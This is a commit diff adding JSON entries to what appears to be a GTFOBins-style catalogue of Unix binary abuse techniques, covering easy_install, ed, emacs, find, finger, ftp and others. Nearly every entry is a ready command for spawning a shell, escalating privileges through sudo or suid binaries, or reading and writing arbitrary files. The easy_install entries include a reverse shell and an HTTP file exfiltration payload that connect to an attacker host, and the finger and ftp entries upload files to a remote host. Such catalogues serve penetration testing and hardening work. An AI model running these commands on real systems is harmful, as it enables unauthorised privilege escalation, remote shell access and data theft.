add new data sources

t0thkr1s 5 years ago
parent c482e59ae3
commit a3db27988b

@ -0,0 +1,53 @@
"functions": {
"shell": [
"code": "TF=$(mktemp -d)\necho \"import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')\" > $TF/\neasy_install $TF\n"
"reverse-shell": [
"description": "Run 'socat file:`tty`,raw,echo=0 tcp-listen:[port]' on the attacker box to receive the shell.",
"code": "TF=$(mktemp -d)\necho 'import sys,socket,os,pty;s=socket.socket()\ns.connect((\"[host]\",[port]))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")' > $TF/\neasy_install $TF\n"
"file-upload": [
"description": "Send local file via 'd' parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. The file path must be absolute.",
"code": "TF=$(mktemp -d)\necho 'import sys;\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"[url]\", bytes(u.urlencode({\"d\":open(\"[file]\").read()}).encode()))' > $TF/\neasy_install $TF\n"
"description": "Serve files in the local folder running an HTTP server. ",
"code": "TF=$(mktemp -d)\necho 'import sys; from os import environ as e\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", [port]), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/\neasy_install $TF\n"
"file-download": [
"description": "Fetch a remote file via HTTP GET request. The file path must be absolute.",
"code": "TF=$(mktemp -d)\necho \"import os;\nos.execl('$(whereis python)', '$(whereis python)', '-c', \\\"\\\"\\\"import sys;\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve('[url]', '[file]')\\\"\\\"\\\")\" > $TF/\npip install $TF\n"
"file-write": [
"description": "The file path must be absolute.",
"code": "TF=$(mktemp -d)\necho \"import os;\nos.execl('$(whereis python)', 'python', '-c', 'open(\\\"[file]\\\",\\\"w+\\\").write(\\\"DATA\\\")')\" > $TF/\neasy_install $TF\n"
"file-read": [
"description": "The read file content is wrapped within program messages. The file path must be absolute.",
"code": "TF=$(mktemp -d)\necho 'print(open(\"[file]\").read())' > $TF/\neasy_install $TF\n"
"library-load": [
"code": "TF=$(mktemp -d)\necho 'from ctypes import cdll; cdll.LoadLibrary(\"\")' > $TF/\neasy_install $TF\n"
"sudo": [
"code": "TF=$(mktemp -d)\necho \"import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')\" > $TF/\nsudo easy_install $TF\n"

@ -0,0 +1,29 @@
"functions": {
"shell": [
"code": "ed\n!/bin/sh\n"
"file-write": [
"code": "ed [file]\na\nDATA\n.\nw\nq\n"
"file-read": [
"code": "ed [file]\n,p\nq\n"
"sudo": [
"code": "sudo ed\n!/bin/sh\n"
"limited-suid": [
"code": "./ed\n!/bin/sh\n"

@ -0,0 +1,29 @@
"functions": {
"shell": [
"code": "emacs -Q -nw --eval '(term \"/bin/sh\")'"
"file-write": [
"code": "emacs [file]\nDATA\nC-x C-s\n"
"file-read": [
"code": "emacs [file]"
"suid": [
"code": "./emacs -Q -nw --eval '(term \"/bin/sh -p\")'"
"sudo": [
"code": "sudo emacs -Q -nw --eval '(term \"/bin/sh\")'"

@ -0,0 +1,19 @@
"functions": {
"shell": [
"code": "env /bin/sh"
"suid": [
"code": "./env /bin/sh -p"
"sudo": [
"code": "sudo env /bin/sh"

@ -0,0 +1,20 @@
"description": "The read file content is corrupted by replacing tabs with spaces.",
"functions": {
"file-read": [
"code": "expand \"[file]\"\n"
"suid": [
"code": "./expand \"[file]\"\n"
"sudo": [
"code": "sudo expand \"[file]\"\n"

@ -0,0 +1,19 @@
"functions": {
"shell": [
"code": "expect -c 'spawn /bin/sh;interact'"
"suid": [
"code": "./expect -c 'spawn /bin/sh -p;interact'"
"sudo": [
"code": "sudo expect -c 'spawn /bin/sh;interact'"

@ -0,0 +1,14 @@
"functions": {
"shell": [
"code": "TF=$(mktemp -d)\necho 'exec(\"/bin/sh\")' > $TF/x.rb\nFACTERLIB=$TF facter\n"
"sudo": [
"code": "TF=$(mktemp -d)\necho 'exec(\"/bin/sh\")' > $TF/x.rb\nFACTERLIB=$TF sudo -E facter\n"

@ -0,0 +1,20 @@
"description": "Each line is corrupted by a prefix string and wrapped inside quotes, so this may not be suitable for binary files. If a line in the target file begins with a '#' it will not be printed as these lines are parsed as comments. It can also be provided with a directory and will read each file in the directory.",
"functions": {
"file-read": [
"code": "file -m [file]\n"
"suid": [
"code": "./file -m [file]\n"
"sudo": [
"code": "sudo file -m [file]\n"

@ -0,0 +1,19 @@
"functions": {
"shell": [
"code": "find . -exec /bin/sh \\; -quit"
"suid": [
"code": "./find . -exec /bin/sh -p \\; -quit"
"sudo": [
"code": "sudo find . -exec /bin/sh \\; -quit"

@ -0,0 +1,17 @@
"description": "'finger' hangs waiting for the remote peer to close the socket.",
"functions": {
"file-upload": [
"description": "Send a binary file to a TCP port. Run 'sudo nc -l -p 79 | base64 -d > [file]' on the attacker box to collect the file. The file length is limited by the maximum size of arguments.",
"code": "finger \"$(base64 [file])@[host]\"\n"
"file-download": [
"description": "Fetch remote binary file from a remote TCP port. Run 'base64 [file] | sudo nc -l -p 79' on the attacker box to send the file.",
"code": "finger x@[host] | base64 -d > [file]\n"

@ -0,0 +1,19 @@
"functions": {
"shell": [
"code": "flock -u / /bin/sh"
"suid": [
"code": "./flock -u / /bin/sh -p"
"sudo": [
"code": "sudo flock -u / /bin/sh"

@ -0,0 +1,20 @@
"description": "The read file content is not binary-safe.",
"functions": {
"file-read": [
"code": "fmt -p NON_EXISTING_PREFIX [file]\n"
"suid": [
"code": "./fmt -p NON_EXISTING_PREFIX [file]\n"
"sudo": [
"code": "sudo fmt -p NON_EXISTING_PREFIX [file]\n"

@ -0,0 +1,19 @@
"functions": {
"file-read": [
"code": "fold -w99999999 [file]\n"
"suid": [
"code": "./fold -w99999999 [file]\n"
"sudo": [
"code": "sudo fold -w99999999 [file]\n"

@ -0,0 +1,26 @@
"functions": {
"shell": [
"code": "ftp\n!/bin/sh\n"
"file-upload": [
"description": "Send local file to a FTP server.",
"code": "ftp [host]\nput [file]\n"
"file-download": [
"description": "Fetch a remote file from a FTP server.",
"code": "ftp [host]\nget [file]\n"
"sudo": [
"code": "sudo ftp\n!/bin/sh\n"